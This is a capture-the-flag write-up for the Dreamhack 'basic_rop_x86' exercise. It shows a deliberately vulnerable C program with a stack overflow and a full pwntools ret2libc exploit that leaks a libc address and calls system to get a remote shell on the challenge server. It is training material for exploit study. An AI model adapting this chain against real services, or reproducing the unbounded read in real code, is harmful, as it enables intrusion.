


dreamhack - basic_rop_x86 write up

Nova_ 2023. 4. 20. 14:47

- source code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


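/*
 * SIGALRM handler installed by initialize(): report the timeout and
 * terminate with status -1 (255 once the kernel truncates it to 8 bits).
 *
 * The original used puts() and exit(), neither of which is
 * async-signal-safe: if the alarm fires while stdio holds its internal
 * lock the handler can deadlock or corrupt the stream state, and exit()
 * runs atexit handlers from signal context. write() and _exit() are the
 * safe equivalents and produce the same bytes and the same exit status
 * (stdout is unbuffered via setvbuf, so exit() had nothing to flush).
 *
 * sig: signal number supplied by the kernel; unused.
 */
void alarm_handler(int sig) {
    static const char msg[] = "TIME OUT\n";
    (void)sig;
    /* A short or failed write cannot be retried meaningfully here. */
    (void)write(STDOUT_FILENO, msg, sizeof(msg) - 1);
    _exit(-1);
}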


/*
 * Process setup for the challenge: disable stdio buffering on stdin and
 * stdout, then arm a 30-second SIGALRM watchdog handled by alarm_handler().
 */
void initialize() {
    FILE *streams[] = {stdin, stdout};
    size_t n = sizeof(streams) / sizeof(streams[0]);

    /* _IONBF: every stdio read/write goes straight to the descriptor. */
    for (size_t i = 0; i < n; i++) {
        setvbuf(streams[i], NULL, _IONBF, 0);
    }

    /* Watchdog: the handler prints "TIME OUT" and terminates after 30 s. */
    signal(SIGALRM, alarm_handler);
    alarm(30);
}

/*
 * Challenge entry point: read up to 0x400 bytes from stdin into a
 * 0x40-byte stack buffer, then echo exactly 0x40 bytes back.
 *
 * read(0, buf, 0x400) accepts sixteen times more input than buf holds, so
 * any input longer than 0x40 bytes overwrites whatever the compiler laid
 * out above buf on the stack. That stack buffer overflow is the bug this
 * exercise is built around; the bounded form is read(0, buf, sizeof(buf)).
 *
 * The echo is fixed at sizeof(buf) bytes and buf is zero-initialised, so
 * the write() reveals only the buffer contents, never adjacent stack data.
 *
 * argc/argv are unused.
 */
int main(int argc, char *argv[]) {
    char buf[0x40] = {};   /* empty initializer: GNU extension before C23 */

    initialize();

    /* Return value of read() is ignored; a short read leaves the rest zero. */
    read(0, buf, 0x400);
    write(1, buf, sizeof(buf));

    return 0;
}

 

- exploit code

# Exploit script as published in the write-up (pwntools). Comments below
# describe what each step does; the code itself is unchanged.
from pwn import *

# Remote challenge endpoint as listed on the page.
p = remote("23.81.42.210", 10466)

# Local copies of the challenge binary and the libc it ships with;
# pwntools parses their symbol/PLT/GOT tables.
e = ELF("./basic_rop_x86")
libc = ELF("./libc.so.6")

# Addresses taken from the binary. The three literal constants are
# absolute, which only holds for a binary loaded at a fixed address
# (non-PIE). NOTE(review): not verifiable from the page.
puts_plt = e.plt['puts']
read_plt = e.plt['read']          # assigned but never used below
read_got = e.got['read']
pop_esi_edi_ebp = 0x08048689      # assigned but never used below
pop_ebp = 0x0804868b              # gadget address as given on the page
main = 0x080485d9                 # address of main() as given on the page

# 0x44 + 4 = 0x48 bytes of filler before the first controlled dword.
# main() declares char buf[0x40], so this is the buffer plus 8 bytes.
# NOTE(review): a stack canary would live in this region and abort the
# process on return; the chain assumes the binary was built without one.
payload = b"A"*0x44 + b"B"*0x4

# Stage 1: puts(read_got) prints the resolved libc address of read(),
# then control returns to main() for a second round of input.
payload += p32(puts_plt)
payload += p32(pop_ebp)   # return address for puts: drops the argument
payload += p32(read_got)  # argument to puts
payload += p32(main)


# Send stage 1. The first 64 bytes received are main()'s
# write(1, buf, sizeof(buf)); the next 4 are what puts printed.
p.send(payload)
print(p.recvn(64))
read = u32(p.recvn(4))    # shadows the builtin read(); harmless here
print(read)
# libc base = leaked read() address - read()'s offset inside libc.so.6.
lb = read - libc.symbols["read"]
system = lb + libc.symbols["system"]
# Hard-coded offset into the shipped libc; the page does not state what
# it refers to. TODO confirm against the bundled libc.so.6 before reuse.
shell = lb + 0x15902b

# Stage 2: same filler, then a call to system() with `shell` as its
# argument. pop_ebp is the return address after system(), so the process
# does not return cleanly once system() finishes.
payload = b"A"*0x44 + b"B"*0x4
payload += p32(system)
payload += p32(pop_ebp)
payload += p32(shell)

# Send stage 2 and hand the connection over to the user.
p.send(payload)
p.interactive()

 

- write
